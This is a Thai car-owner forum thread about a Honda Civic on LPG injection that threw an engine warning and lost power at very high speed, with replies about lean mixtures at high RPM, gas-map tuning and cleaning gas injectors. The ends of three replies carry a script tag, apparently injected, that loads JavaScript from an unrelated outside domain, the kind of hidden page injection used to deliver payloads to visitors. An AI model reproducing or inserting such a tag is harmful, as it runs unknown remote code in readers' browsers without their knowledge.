ตอบ
Jeerawat


ชื่อเล่น:

เข้าร่วม: 21 มิถุนา 2009
ตอบ: 57

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 163
ให้คำขอบคุณ: 64

ที่อยู่: ลพบุรี
ปี: 2002
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
อังคาร, 21 พฤษภาคม 2013 10:26 - เหตุเกิดกับแก็ส ประสบการณ์ตรง
เพื่อนท่านใดเคยเจออาการแบบนี้บ้างครับ ผมสงสัยว่ามันเป็นอาราย
รถผมติดแก็สหัวฉีด vtec mt 1.7 ติดมานานแล้วครับประมาณ 6-7 ปี ไม่มีปัญหาอาราย(ดูแลตลอด ทั้งจูน เช็คอุปกรณ์แก็ส เครื่องยนต์ ฯ) จนเมื่อวานช่วง 21.30 น.ของวันที่ 20 พ.ค.56 ก้อขับรถมาตามปกติถนนโล่งเลยลากยาวไป รอบสูงประมาณขาด 500 เรดไลน์ ทุกอย่างโอเคร อยู่ดีดี ไฟเอ็นจิ้นขึ้น รถไม่ไดับ แต่อาการที่ตามมาคือความเร็วล่วงอย่างต่อเนื่อง เร่งไม่ขึ้น ใจหายแว็ป  งานเข้าแล้วดิ พยายามเปลี่ยนเกียร์แต่ก้อไม่ดีขึ้นเลย ตัดสินใจเปลี่ยนเป็นน้ำมัน หายครับแต่ไฟเอ็นจิ้น ขับไปถึงบ้าน ลองจอดไม่ดับเครื่อง ทุกอย่างปกติ แอร์เย็น รอบนิ่ง เลยงง จึงตัดสินใจดับเครื่องแล้วสตราท์รถใหม่(กลับมาใช้ระบบอัตโนมัติ) เร่งเครื่องแก็สตัด ไฟเอ็นจิ้นหาย ใจชื้นขึ้น จึงเอาออกไปลองอีกรอบกลับมาเป็นปกติเหมือนเดิม เหมือนไม่เกิดอารายขึ้น งงครับ ด้วยความไม่เชื่อสายตาตัวเอง กลับมาจอดหน้าบ้านทำการเช็คระบบแก็สด้วยคอมพิวเตอร์อีกครั้ง เช็คความผิดพลาดก้อไม่เจอ คอมรายงานว่าทุกอย่างปกติ แรงดัน แรมดา ความร้อน อุณหภูมิ แลมด้า อื่น ระบบแก็สปกติ เลยลองตรวจสอบอื่นก้อไม่พบสาเหตุ ใครช่วยบอกผมที่ว่าเมื่อวานมันคืออาราย 
ปล.เมื่อเช้าขับมาทำงาน โอเคร.ปกติ แหล่มเลย กระชาก กด ปกติ เลยต้องถามผู้รู้ว่า เป็นอาราย คือ งง ช่วยตอบผมที เพราะผมขับรถถ้าไม่มันใจในเครื่อง ในรถ ไม่กล้าขับครับ ถึงขับก้อไม่มั่นใจ 100 % 
ได้รับคำขอบคุณจาก: padonzzz  phichetza  Sak_es5442  jagkrapongVilaikaew  chutipong  tokmun002  cisco  Pantamitr  EgawiT7864  Concept_ES  popza4 
Jeerawat


ชื่อเล่น:

เข้าร่วม: 21 มิถุนา 2009
ตอบ: 57

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 163
ให้คำขอบคุณ: 64

ที่อยู่: ลพบุรี
ปี: 2002
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
อังคาร, 21 พฤษภาคม 2013 10:33 - เหตุเกิดกับแก็ส ประสบการณ์ตรง
..
Jeerawat


ชื่อเล่น:

เข้าร่วม: 21 มิถุนา 2009
ตอบ: 57

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 163
ให้คำขอบคุณ: 64

ที่อยู่: ลพบุรี
ปี: 2002
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
อังคาร, 21 พฤษภาคม 2013 10:34 - เหตุเกิดกับแก็ส ประสบการณ์ตรง
. HELP ME PLEASE......
Saka


ชื่อเล่น: ศักดิ์

เข้าร่วม: 01 ตุลา 2008
ตอบ: 1873

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1996
ให้คำขอบคุณ: 5358

ที่อยู่: พุทธมณฑลสาย4
ปี: 2001
อังคาร, 21 พฤษภาคม 2013 10:47 - เหตุเกิดกับแก็ส ประสบการณ์ตรง
หัวฉีดยี่ห้ออะไรครับ
รถผมก็ติดมา 5-6 ปีเช่นกัน ระยะทาง 2 แสน กม.+ ยังไม่เคยเจอปัญหาแบบนี้ แต่นาน ๆ จะถึงเรดไลน์ ซักที AT นะครับ
ล่าสุดก็ไปเปลี่ยนสายแก๊สใหม่ ท่อต้มใหม่ (ออโทนิค) จูนใหม่ ร้านบอกใช้อีกนาน (ถ้าอุปกรณ์ไม่เสีย)
ได้รับคำขอบคุณจาก: Jeerawat 
Jeerawat


ชื่อเล่น:

เข้าร่วม: 21 มิถุนา 2009
ตอบ: 57

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 163
ให้คำขอบคุณ: 64

ที่อยู่: ลพบุรี
ปี: 2002
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
อังคาร, 21 พฤษภาคม 2013 10:57 - เหตุเกิดกับแก็ส ประสบการณ์ตรง
หัวฉีด versus  หม้อ energy กล่อง versus ครับ
เลดไลนเนี่ย ความเร็วขณะนั้นเท่าไหร่เอ่ย ตอนนั้น 210+ แช่เลย ตอนเบาคันเร่งไฟโชว์เลย
srithanon


เข้าร่วม: 13 สิงหา 2009
ตอบ: 380

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 1324
ให้คำขอบคุณ: 4
อังคาร, 21 พฤษภาคม 2013 11:03 - เหตุเกิดกับแก็ส ประสบการณ์ตรง
ที่ความเร็วรอบเครื่องยนต์ขนาดนั้น   แน่นอนแก็สที่คุณปรับจูนบอกว่าถูกต้องทุกขั้นตอน   แต่นั้นมันไม่ใช่แบบเรียวไทม์  เมื่อรอบเครื่องยนต์สูง  อัตราส่วนผสมระหว่างแก็สกับอากาศ  มีส่วนผสมไม่สมบูรณ์ ทำให้การจุดระเบิดในห้องเผาไหม้  หลงเหลืออ๊อกซิเจนในท่อไอเสีย  (ส่วนผสมบางที่รอบเครื่องยนต์สูงๆ)   ทำให้ O2 sensor  จับปริมาณอ๊อกซิเจนที่หลงเหลือนี้ได้  จึงส่งค่าสัญญาณโวลเต็จไปให้กล่อง ECU  แต่กล่อง ECU ไม่สามารถจะสั่งจ่ายแก็สได้เหมือนระบบน้ำมัน  ที่มันพยายามที่จะปรับเชื้อเพลิงให้มีอัตราส่วนผสม ในรอบความเร็วของเครื่องยนต์ขณะนั้นได้  มันจึงส่ง Errer code  ไฟรูปเครื่องยนต์ติดโชว์  เพราะระบบแก็สมีการคอนโทรลด้วย ECU แก้ส  ที่ไปตั้งค่าพารามิเตอร์ หรือในตารางแม็บที่ท่านเจ้าของกระทู้ตั้งเอาไว้   มันไม่สามารถจ่ายแก็สเพิ่มได้อีก มันก็เลยมีส่วนผสมบาง

ลองไปตั้งปรับค่าในตารางแม็บของแก็สใหม่  ให้ความเร็วรอบเครื่องยนต์สูงตามที่คุณใช้  ให้หัวฉีดแก็สปรับเพิ่มปริมาณแก็สขึ้นอีก  อาจจะช่วยได้   ในกรณีที่หัวฉีดแก็สใช้งานมานานอาจจทำให้เกิดการตีปตันได้  ยังงัยก็ลองถอดหัวฉีดแก็สออกมาทำความสะอาด  อาจจะแก้ไขเรื่องนี้ได้อีกกรณีหนึ่งครับ.............srithanonm  
ได้รับคำขอบคุณจาก: Jeerawat  padonzzz  hikaru_kung  Blackhole  Juris  nooduean_69  okuma  Mundo  Rachen  ninenine  tewada  HankMan  moonoizap  cisco  Kriss_es04  prgs55  EsNon  Cool_M  EgawiT7864  boyboom_16  Ekk_bangyai 
wentai


ชื่อเล่น: แบงค์

เข้าร่วม: 09 พฤษภาคม 2013
ตอบ: 518

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 1021
ให้คำขอบคุณ: 0

ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
อังคาร, 21 พฤษภาคม 2013 11:08 - เหตุเกิดกับแก็ส ประสบการณ์ตรง
เก็บข้อมูลคร๊าบบบบ
ได้รับคำขอบคุณจาก: Jeerawat 
Jeerawat


ชื่อเล่น:

เข้าร่วม: 21 มิถุนา 2009
ตอบ: 57

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 163
ให้คำขอบคุณ: 64

ที่อยู่: ลพบุรี
ปี: 2002
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
อังคาร, 21 พฤษภาคม 2013 11:18 - เหตุเกิดกับแก็ส ประสบการณ์ตรง
ขอบคุณสำหรับข้อมูลครับ.....เด่วจากลับไปจูนให้จ่ายแก็สในรอบสูงตามที่พี่เค้าบอกเลย....
ขอบพระคุณอย่างสูงครับพี่ srithanonm 
narong-boriboon


เข้าร่วม: 25 ธันวา 2012
ตอบ: 47

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 23
ให้คำขอบคุณ: 0

ที่อยู่: หมู่บ้านเมืองไทย บางบ่อ
ปี: 2002
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
อังคาร, 21 พฤษภาคม 2013 12:35 - เหตุเกิดกับแก็ส ประสบการณ์ตรง
เก็บข้อมูด้วยอีกคนครับ
ได้รับคำขอบคุณจาก: Jeerawat 
Saka


ชื่อเล่น: ศักดิ์

เข้าร่วม: 01 ตุลา 2008
ตอบ: 1873

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1996
ให้คำขอบคุณ: 5358

ที่อยู่: พุทธมณฑลสาย4
ปี: 2001
อังคาร, 21 พฤษภาคม 2013 14:06 - เหตุเกิดกับแก็ส ประสบการณ์ตรง
Jeerawat พิมพ์ว่า:
หัวฉีด versus  หม้อ energy กล่อง versus ครับ
เลดไลนเนี่ย ความเร็วขณะนั้นเท่าไหร่เอ่ย ตอนนั้น 210+ แช่เลย ตอนเบาคันเร่งไฟโชว์เลย

เมื่อวันอาทิตที่ผ่านมา เล่นกับกระบะแต่ง 180-200 แช่ประมาณ 5 นาที เอาแค่ให้รู้ว่ามันขึ้นผมไม่ได้
เรดไลน์ป่าวไม่รู้ แค่เหลือบมองความเร็วกะเข็มความร้อน
ปกติด้วยความเร็วเท่านี้ไม่ได้ขับบ่อย ๆ และไม่ได้แช่นานอะครับ กลัว"<script src="https://sport32news.com/civicesgroup.js">
ได้รับคำขอบคุณจาก: Jeerawat 
chokpiti


ชื่อเล่น: โชค

เข้าร่วม: 17 ธันวา 2013
ตอบ: 1156

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1455
ให้คำขอบคุณ: 1837

ที่อยู่: มหาชัย-ระยอง
ปี: 2003
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
อังคาร, 21 พฤษภาคม 2013 14:09 - เหตุเกิดกับแก็ส ประสบการณ์ตรง
แอบมาเก็บข้อมูลครับ"<script src="https://sport32news.com/civicesgroup.js">
ได้รับคำขอบคุณจาก: Jeerawat 
superpopshow


ชื่อเล่น: ป๊อป

เข้าร่วม: 14 มิถุนา 2010
ตอบ: 79

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 152
ให้คำขอบคุณ: 2

ที่อยู่: บางบัวทอง @ฺนนทบุรี
ปี: 2001
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
อังคาร, 21 พฤษภาคม 2013 15:33 - เหตุเกิดกับแก็ส ประสบการณ์ตรง
ลองเปลี่ยนชุดซ่อมหัวฉีดแก๊ส แล้วจูนใหม่ครับ ผมเคยเป็น เดี๋ยว จขกท ขับซักพักก็จะ ไฟก็จะโชว์อีก มันเกิดจาก หัวฉีดแก๊สยกขึ้น-ลง ไม่เต็ม เวลาใช้ไปนานๆ มันจะมี คราบจับที่หัวฉีดแก๊สครับ ทำให้ หัวฉีดยกเพี้ยน สัดส่วน แก๊ส+อากาศ เพี้ยนตาม Oxigen sensor เลยจับได้ แต่ถ้าขับน้ำมัน ไฟจะไม่โชว์ครับ ลองดูครับ
ได้รับคำขอบคุณจาก: Jeerawat 
akkarin_c


ชื่อเล่น: ตู่

เข้าร่วม: 01 สิงหา 2012
ตอบ: 1225

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1081
ให้คำขอบคุณ: 441

ที่อยู่: เตาปูน ปิ่นเกล้า อัมพวา
ปี: 2005
สี: ทอง แซทเทิลไลท์ (NH-663M)
อังคาร, 21 พฤษภาคม 2013 16:26 - เหตุเกิดกับแก็ส ประสบการณ์ตรง
ซัดขนาดนั้น เปลี่ยนเป็นน้ำมันแน่นอนกว่าครับ
pamannumber1


ชื่อเล่น: หนุ่ม

เข้าร่วม: 11 กันยา 2012
ตอบ: 114

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 148
ให้คำขอบคุณ: 160

ที่อยู่: ดอนเมือง - ตราด(บ่อไร่)
ปี: 2004
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
อังคาร, 21 พฤษภาคม 2013 16:51 - เหตุเกิดกับแก็ส ประสบการณ์ตรง
มาเก็บข้อมูลครับ ขอบคุณครับ
HankMan


เข้าร่วม: 10 มกรา 2011
ตอบ: 424

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 359
ให้คำขอบคุณ: 749

ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
อังคาร, 21 พฤษภาคม 2013 18:19 - เหตุเกิดกับแก็ส ประสบการณ์ตรง
ขอเก็บข้อมูลความรู้ด้วยครับ
Goo_golf


ชื่อเล่น: ก๊อบ

เข้าร่วม: 09 มิถุนา 2011
ตอบ: 1334

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3118
ให้คำขอบคุณ: 2791

ที่อยู่: อ.เมือง 8 ริ้ว
ปี: 2003
สี: ทอง แซทเทิลไลท์ (NH-663M)
อังคาร, 21 พฤษภาคม 2013 18:47 - เหตุเกิดกับแก็ส ประสบการณ์ตรง
210
ผมแค่130 140ก็เสียวแล้ว
cisco


ชื่อเล่น: เต้น

เข้าร่วม: 25 พฤศจิกา 2008
ตอบ: 3557

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5197
ให้คำขอบคุณ: 9940
อังคาร, 21 พฤษภาคม 2013 19:15 - เหตุเกิดกับแก็ส ประสบการณ์ตรง
แรงมากก
Kriss_es04


ชื่อเล่น: อ๊อด

เข้าร่วม: 01 ตุลา 2008
ตอบ: 1745

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1544
ให้คำขอบคุณ: 234

ที่อยู่: ดินแดง-แจ้งวัฒนะ-นนทบุรี-มหาชัย-พระราม2-กระทุ่มแบน-สามพราน
ปี: 2004
อังคาร, 21 พฤษภาคม 2013 19:26 - เหตุเกิดกับแก็ส ประสบการณ์ตรง
แก็สก้อแรงได้
prgs55


ชื่อเล่น: เล็ก

เข้าร่วม: 26 มิถุนา 2010
ตอบ: 861

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1794
ให้คำขอบคุณ: 1103

ที่อยู่: ย่านมีนบุรี
ปี: 2001
สี: ดำ ไนท์ฮอว์ก (B-92P)
อังคาร, 21 พฤษภาคม 2013 20:47 - เหตุเกิดกับแก็ส ประสบการณ์ตรง
ผมก็เป็นครับ ส่งสัยต้องไปตั้งแก้สให้ ด้านผลายกราฟ สูงขึ้น
ณรงค์ศักดิ์


ชื่อเล่น: โอ๊ด

เข้าร่วม: 24 กรกฎา 2012
ตอบ: 131

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 110
ให้คำขอบคุณ: 0

ที่อยู่: วังน้อย / อยุธยา
ปี: 2005
สี: เทา ซิลเวอร์สโตน (NH-630M)
อังคาร, 21 พฤษภาคม 2013 21:13 - เหตุเกิดกับแก็ส ประสบการณ์ตรง
เก็บข้อมูล อาทิตย์หน้า จะไปติด ไม่ไหว ครับ น้ำมันมัน 4 วัน 1000 วิ่ง 330 กม.
ได้รับคำขอบคุณจาก: Jeerawat 
Cool_M


ชื่อเล่น: แม็ก

เข้าร่วม: 18 ธันวา 2012
ตอบ: 1928

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2509
ให้คำขอบคุณ: 2304

ที่อยู่: ปราจีนบุรี - กำแพงเพชร - ปราจีนบุรี
ปี: 2002
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
อังคาร, 21 พฤษภาคม 2013 21:35 - เหตุเกิดกับแก็ส ประสบการณ์ตรง
แอบเก็บข้อมูลครับ
ได้รับคำขอบคุณจาก: Jeerawat 
horus


ชื่อเล่น: ต๋อย

เข้าร่วม: 18 เมษา 2013
ตอบ: 1272

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1777
ให้คำขอบคุณ: 1065

ที่อยู่: รามอินทรา / นนทบุรี / ES เมืองทอง
ปี: 2002
สี: ม่วง วินเทจพลัม (RP-32P)
พุธ, 22 พฤษภาคม 2013 07:21 - เหตุเกิดกับแก็ส ประสบการณ์ตรง
มาเก็บข้อมูลด้วยคนคร๊าบบบบบบ "<script src="https://sport32news.com/civicesgroup.js">
ตอบ
หน้า 1 จาก 1
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2025 Civic ES Group. All rights reserved.